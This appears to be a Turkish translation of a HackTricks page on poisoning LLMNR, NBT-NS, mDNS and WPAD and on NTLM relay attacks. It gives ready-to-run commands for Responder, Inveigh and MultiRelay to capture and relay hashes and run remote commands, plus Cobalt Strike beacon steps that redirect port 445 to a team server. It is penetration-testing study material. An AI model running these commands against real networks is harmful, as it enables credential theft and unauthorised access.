10 KiB
Sahte LLMNR, NBT-NS, mDNS/DNS ve WPAD ve Aktarma Saldırıları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live** takip edin.**
- Hacking püf noktalarını paylaşarak PR'ler göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
Ağ Protokolleri
Yerel Ana Bilgisayar Çözümleme Protokolleri
- LLMNR, NBT-NS ve mDNS:
- Microsoft ve diğer işletim sistemleri DNS başarısız olduğunda yerel ad çözümlemesi için LLMNR ve NBT-NS kullanır. Benzer şekilde, Apple ve Linux sistemleri mDNS kullanır.
- Bu protokoller, kimlik doğrulamasız, UDP üzerinden yayın yapmaları nedeniyle dinleme ve sahtecilikten etkilenir.
- Bu protokollerin sorgulayan ana bilgisayarlara sahte yanıtlar göndererek hizmetleri taklit etmek için Responder kullanılabilir.
- Responder kullanarak hizmet taklit etme hakkında daha fazla bilgiye buradan ulaşılabilir.
Web Proxy Otomatik Keşif Protokolü (WPAD)
- WPAD tarayıcıların proxy ayarlarını otomatik olarak keşfetmelerine olanak tanır.
- Keşif, DHCP, DNS veya DNS başarısız olursa LLMNR ve NBT-NS'ye geri dönerek kolaylaştırılır.
- Responder, istemcileri kötü niyetli WPAD sunucularına yönlendiren WPAD saldırılarını otomatikleştirebilir.
Protokol Zehirleme İçin Responder
- Responder, LLMNR, NBT-NS ve mDNS sorgularını zehirlemek için kullanılan bir araçtır, sorgu türlerine göre seçici olarak yanıt verir ve genellikle SMB hizmetlerini hedef alır.
- Kali Linux'ta önceden yüklenmiş olarak gelir ve
/etc/responder/Responder.conf
konumunda yapılandırılabilir. - Responder, yakalanan hash'leri ekranda gösterir ve bunları
/usr/share/responder/logs
dizininde kaydeder. - IPv4 ve IPv6'yı destekler.
- Responder'ın Windows sürümü burada bulunabilir.
Responder'ı Çalıştırma
- Varsayılan ayarlarla Responder'ı çalıştırmak için:
responder -I <Arayüz>
- Daha agresif sorgulama için (potansiyel yan etkilerle):
responder -I <Arayüz> -P -r -v
- NTLMv1 meydan okumalarını/yanıtlarını daha kolay kırabilmek için teknikler:
responder -I <Arayüz> --lm --disable-ess
- WPAD taklit edilmesi şu şekilde etkinleştirilebilir:
responder -I <Arayüz> --wpad
- NetBIOS istekleri saldırganın IP'sine çözümlenebilir ve kimlik doğrulama vekili kurulabilir:
responder.py -I <arayüz> -Pv
Responder ile DHCP Zehirleme
- DHCP yanıtlarını sahteleştirerek bir kurbanın yönlendirme bilgilerini kalıcı olarak zehirleyebilir, ARP zehirleme için daha gizli bir alternatif sunar.
- Hedef ağın yapılandırması hakkında kesin bilgi gerektirir.
- Saldırıyı çalıştırmak:
./Responder.py -I eth0 -Pdv
- Bu yöntem etkili bir şekilde NTLMv1/2 hash'lerini yakalayabilir, ancak ağ kesintisinden kaçınmak için dikkatli bir şekilde ele alınmalıdır.
Responder ile Kimlik Bilgilerinin Yakalanması
- Responder yukarıda bahsedilen protokoller kullanılarak hizmetleri taklit eder, kullanıcılar sahtecilik yapılan hizmetlere kimlik doğrulamaya çalıştığında kimlik bilgilerini (genellikle NTLMv2 Meydan Okuma/Yanıtı) yakalar.
- Kimlik bilgilerini daha kolay kırmak için NetNTLMv1'e düşürme veya ESS'yi devre dışı bırakma girişimleri yapılabilir.
Bu tekniklerin yasal ve etik bir şekilde kullanılması, uygun yetkilendirme sağlanması ve ağda kesinti veya izinsiz erişimden kaçınılması önemlidir.
Inveigh
Inveigh, Windows sistemler için tasarlanmış bir araçtır ve penetrasyon testçileri ve kırmızı takım üyeleri için benzer işlevlere sahiptir. Sahtecilik ve adam ortasında saldırılar gerçekleştiren Responder'a benzer işlevsellikler sunar. Araç, bir PowerShell betiğinden C# ikiliye evrim geçirmiş olup Inveigh ve InveighZero ana sürümleri olarak geliştirilmiştir. Detaylı parametreler ve talimatlar wiki sayfasında bulunabilir.
Inveigh, PowerShell üzerinden çalıştırılabilir:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Ya da bir C# ikili dosyası olarak yürütülür:
Inveigh.exe
NTLM Aktarım Saldırısı
Bu saldırı, bir hedef makineye erişmek için SMB kimlik doğrulama oturumlarını kullanır ve başarılı olursa bir sistem kabuğu sağlar. Ana gereksinimler şunlardır:
- Kimlik doğrulayan kullanıcının, iletilen ana bilgisayarda Yerel Yönetici erişimine sahip olması gerekir.
- SMB imzalamasının devre dışı bırakılması gerekmektedir.
445 Port Yönlendirme ve Tünelleme
Doğrudan ağ tanıtımının mümkün olmadığı senaryolarda, 445 numaralı port üzerindeki trafiğin yönlendirilmesi ve tünellenmesi gerekmektedir. PortBender gibi araçlar, 445 numaralı port trafiğini başka bir porta yönlendirmede yardımcı olur; bu, yerel yönetici erişimi sürücü yükleme için kullanılabilir olduğunda önemlidir.
Cobalt Strike'da PortBender kurulumu ve işleyişi:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
NTLM Aktarım Saldırısı için Diğer Araçlar
- Metasploit: Proxy'ler, yerel ve uzak ana bilgisayar ayrıntıları ile kurulur.
- smbrelayx: SMB oturumlarını aktarmak ve komutları yürütmek veya arka kapılar dağıtmak için Python betiği.
- MultiRelay: Belirli kullanıcıları veya tüm kullanıcıları aktarmak, komutları yürütmek veya hash'leri dökmek için Responder paketinden bir araç.
Her bir araç, gerektiğinde SOCKS proxy üzerinden çalışacak şekilde yapılandırılabilir, dolaylı ağ erişimi ile bile saldırıları mümkün kılar.
MultiRelay İşlemi
MultiRelay, belirli IP'ler veya kullanıcıları hedefleyerek /usr/share/responder/tools dizininden yürütülür.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
NTLM Aktarım Saldırılarını Yapmak İçin Kapsamlı Bir Set
Windows'ta bazı ayrıcalıklı hesapları zorlayarak bu hesapların keyfi makinelerde kimlik doğrulamasını yapmasını sağlayabilirsiniz. Nasıl yapılacağını öğrenmek için aşağıdaki sayfayı okuyun:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Referanslar
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
{% hint style="success" %}
AWS Hacking'ı Öğrenin ve Uygulayın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'ı Öğrenin ve Uygulayın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @hacktricks_live** takip edin.**
- Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.